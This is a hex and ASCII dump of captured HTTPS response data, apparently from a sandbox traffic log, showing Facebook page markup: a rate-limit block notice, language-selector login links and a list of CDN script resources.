                                                                                    2023-02-07 18:46:04 UTC1047INData Raw: 70 74 6d 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 43 6f 6e 74 65 6e 74 22 3e 49 74 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 79 6f 75 20 77 65 72 65 20 6d 69 73 75 73 69 6e 67 20 74 68 69 73 20 66 65 61 74 75 72 65 20 62 79 20 67 6f 69 6e 67 20 74 6f 6f 20 66 61 73 74 2e 20 59 6f 75 e2 80 99 76 65 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 62 6c 6f 63 6b 65 64 20 66 72 6f 6d 20 75 73 69 6e 67 20 69 74 2e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 42 61 72 20 75 69 42 6f 78 47 72 61 79 20 74 6f 70 62 6f 72 64 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 66 6c 6f 61 74 20 5f 6f 68 66 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73
                                                                                    Data Ascii: ptm uiInterstitialContent">It looks like you were misusing this feature by going too fast. Youve been temporarily blocked from using it.</div><div class="uiInterstitialBar uiBoxGray topborder"><div class="clearfix"><div class="rfloat _ohf"><label class
                                                                                    2023-02-07 18:46:04 UTC1049INData Raw: 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f
                                                                                    Data Ascii: gin.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_
                                                                                    2023-02-07 18:46:04 UTC1050INData Raw: 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 73 71 5f 41 4c 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63
                                                                                    Data Ascii: t;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selec
                                                                                    2023-02-07 18:46:04 UTC1052INData Raw: 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75
                                                                                    Data Ascii: unt_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u
                                                                                    2023-02-07 18:46:04 UTC1053INData Raw: 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66 79 3d 22 2f 73 65 74 74 69 6e 67 73 2f 6c 61 6e 67 75 61 67 65 2f 6c 61 6e 67 75 61 67 65 2f 3f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 6c 6f 67 69 6e 2e 70 68 70 25 33 46 6e 65 78 74 25 33 44 68 74 74 70 73 25 32 35 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 35 32 46 61 64 73 25 32 35 32 46 6d 61 6e 61 67 65 72 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d
                                                                                    Data Ascii: l="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title=
                                                                                    2023-02-07 18:46:04 UTC1055INData Raw: 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 25 32 46 26 61 6d 70 3b 68 3d 41 54 30 4f 65 6e 42 4b 6e 4b 7a 32 32 4f 55 31 79 6d 4e 63 35 4b 5f 63 73 79 74 4d 50 50 59 33 4c 50 53 43 47 53 53 78 57 44 39 44 49 32 54 48 51 55 47 6b 6e 49 54 37 72 75 6d 34 74 31 59 35 30 49 68 4d 6c 5f 55 50 55 4f 66 35 33 6c 4f 57 70 37 42 49 78 38 71 6e 4d 6d 46 57 73 6b 73 57 53 39 70 6a 46 6d 64 4e 6e 38 35 33 4c 72 76 69 6f 33 58 75 74 35 42 5f 59 6d 4f 78 73 65 4d 50 63 58 5f 52 77 36 33 5f 5a 36 6c 50 76 46 31 47 6e 61 4e 67 56 41 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64
                                                                                    Data Ascii: u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0OenBKnKz22OU1ymNc5K_csytMPPY3LPSCGSSxWD9DI2THQUGknIT7rum4t1Y50IhMl_UPUOf53lOWp7BIx8qnMmFWsksWS9pjFmdNn853Lrvio3Xut5B_YmOxseMPcX_Rw63_Z6lPvF1GnaNgVA" title="Check out Instagram" target="_blank" rel="nofollow" d
                                                                                    2023-02-07 18:46:04 UTC1056INData Raw: 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65
                                                                                    Data Ascii: Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a href="/policies/cookie
                                                                                    2023-02-07 18:46:04 UTC1058INData Raw: 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 64 37 41 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 51 71 73 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73
                                                                                    Data Ascii: 31":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736ud7A"},"3212":{"result":true,"hash":"AT7tgdobiEoC5qOAQqs"},"1908135":{"result":fals
                                                                                    2023-02-07 18:46:04 UTC1059INData Raw: 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 67 68 79 6e 64 37 54 36 43 43 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 58 61 67 66 70 4e 43 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 39 6e 32 4c 35 77 41 33 55 6a 62 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 73 4d 63 64 31 30 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e
                                                                                    Data Ascii: .fbcdn.net\/rsrc.php\/v3\/yW\/r\/ghynd7T6CCb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"XagfpNC":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/9n2L5wA3Ujb.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"msMcd10":{"type":"js","src":"https:\/\/static.xx.fbcdn.
                                                                                    2023-02-07 18:46:04 UTC1061INData Raw: 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4a 66 58 34 5c 2f 79 6a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 4a 58 41 33 48 65 70 48 39 41 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 54 4b 7a 6d 76 56 46 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 35 5c 2f 72 5c 2f 4f 4a 67 49 66 64 73 63 58 49 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 43 47 6b 48 34 46 59 22 3a 7b 22 74 79 70 65 22 3a 22 6a
                                                                                    Data Ascii: rc":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iJfX4\/yj\/l\/en_US\/JXA3HepH9AQ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"TKzmvVF":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y5\/r\/OJgIfdscXIR.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"CGkH4FY":{"type":"j
                                                                                    2023-02-07 18:46:04 UTC1062INData Raw: 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 75 79 4c 4c 74 59 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 45 5f 67 34 5c 2f 79 48 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 43 66 54 61 69 79 2d 6c 6a 45 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 46 45 66 4e 4d 6c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 61 4f 36 34 5c 2f 79 42 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 74 31 42 6c 55 32 54 57 6c 75 43 2e 6a 73
                                                                                    Data Ascii: z","nc":1},"uyLLtYc":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iE_g4\/yH\/l\/en_US\/CfTaiy-ljEa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IFEfNMl":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iaO64\/yB\/l\/en_US\/t1BlU2TWluC.js
                                                                                    2023-02-07 18:46:04 UTC1064INData Raw: 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 44 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 31 70 6d 34 35 64 69 62 4c 62 4b 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 77 4b 73 53 72 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 74 5c 2f 72 5c 2f 66 75 30 48 7a 55 61 64 57 44 77 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 47 70 51 46 42 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74
                                                                                    Data Ascii: c.php\/v3iLl54\/yD\/l\/en_US\/1pm45dibLbK.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"EwKsSrH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/fu0HzUadWDw.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"GpQFBwL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net
                                                                                    2023-02-07 18:46:04 UTC1065INData Raw: 6f 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 71 32 66 64 79 56 72 49 47 78 46 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 33 34 6d 43 46 42 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4b 5c 2f 72 5c 2f 4a 51 45 4d 63 38 6f 6f 68 77 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 66 34 34 6f 52 47 22 3a 7b 22 74
                                                                                    Data Ascii: oG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/q2fdyVrIGxF.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"34mCFBw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/r\/JQEMc8oohwf.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Ff44oRG":{"t
                                                                                    2023-02-07 18:46:04 UTC1067INData Raw: 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 51 32 59 49 7a 55 79 77 33 33 66 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6c 39 7a 39 4b 5c 2f 73 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4d 5c 2f 72 5c 2f 42 4e 32 4b 66 47 77 57 55 50 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 45 77 45 77 71 49 33 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34
                                                                                    Data Ascii: /l\/en_US\/Q2YIzUyw33f.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"l9z9K\/s":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yM\/r\/BN2KfGwWUPQ.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"EwEwqI3":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4
                                                                                    2023-02-07 18:46:04 UTC1068INData Raw: 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 65 6b 2b 62 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 72 5c 2f 44 5a 5f 56 42 6c 73 79 2d 64 43 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 5c 2f 37 37 36 47 49 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 54 5c 2f 72 5c 2f 78 47 5f 45 4a 69 5a 61 2d 77 2d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22
                                                                                    Data Ascii: ","nc":1},"hIek+bG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/DZ_VBlsy-dC.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L\/776GI":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yT\/r\/xG_EJiZa-w-.js?_nc_x=Ij3Wp8lg5Kz","nc"
                                                                                    2023-02-07 18:46:04 UTC1069INData Raw: 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 61 35 4f 7a 5a 7a 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 70 5a 64 75 6a 50 47 4e 37 43 74 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 5c 2f 6d 72 35 56 45 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 64 61 74 61 3a 74 65 78 74 5c 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 49 32 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6f 5a 57 6c 6e 61 48 51 36 4e 44
                                                                                    Data Ascii: _x=Ij3Wp8lg5Kz","nc":1},"a5OzZzn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/pZdujPGN7Ct.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"P\/mr5VE":{"type":"css","src":"data:text\/css; charset=utf-8;base64,I2Jvb3Rsb2FkZXJfUF9tcjVWRXtoZWlnaHQ6ND
                                                                                    2023-02-07 18:46:04 UTC1071INData Raw: 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 72 22 3a 5b 22 65 39 41 4e 7a 77 5c 2f 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 55 52 49 22 3a 7b 22 72 22 3a 5b 5d 2c 22 62 65 22 3a 31 7d 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 3a 7b 22 72 22 3a 5b 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 63 36 6b 70 52 4b 63 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 41 70 70 72 6f 76 61 6c 22 3a 7b 22 72 22 3a 5b 22 6a 46 45 32 72 6d 6e 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d
                                                                                    Data Ascii: ansitions","BanzaiScuba_DEPRECATED","Animation"],"r":["e9ANzw\/"]},"be":1},"URI":{"r":[],"be":1},"trackReferrer":{"r":[],"rds":{"m":["BanzaiScuba_DEPRECATED"],"r":["c6kpRKc"]},"be":1},"PhotoTagApproval":{"r":["jFE2rmn","uyLLtYc","msMcd10","BnbajS7","Kk81m
                                                                                    2023-02-07 18:46:04 UTC1072INData Raw: 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 72 22 3a 5b 22 65 39 41 4e 7a 77 5c 2f 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 73 22 3a 7b 22 72 22 3a 5b 22 6a 46 45 32 72 6d 6e 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 4b 6b 38 31 6d 31 59 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 54 47 65 73 41 30 61 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 46 6a 52 78 47 78
                                                                                    Data Ascii: ["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"r":["e9ANzw\/"]},"be":1},"PhotoTags":{"r":["jFE2rmn","uyLLtYc","msMcd10","5p9Jgd9","BnbajS7","Kk81m1Y"],"be":1},"TagTokenizer":{"r":["TGesA0a","c6kpRKc","FjRxGx
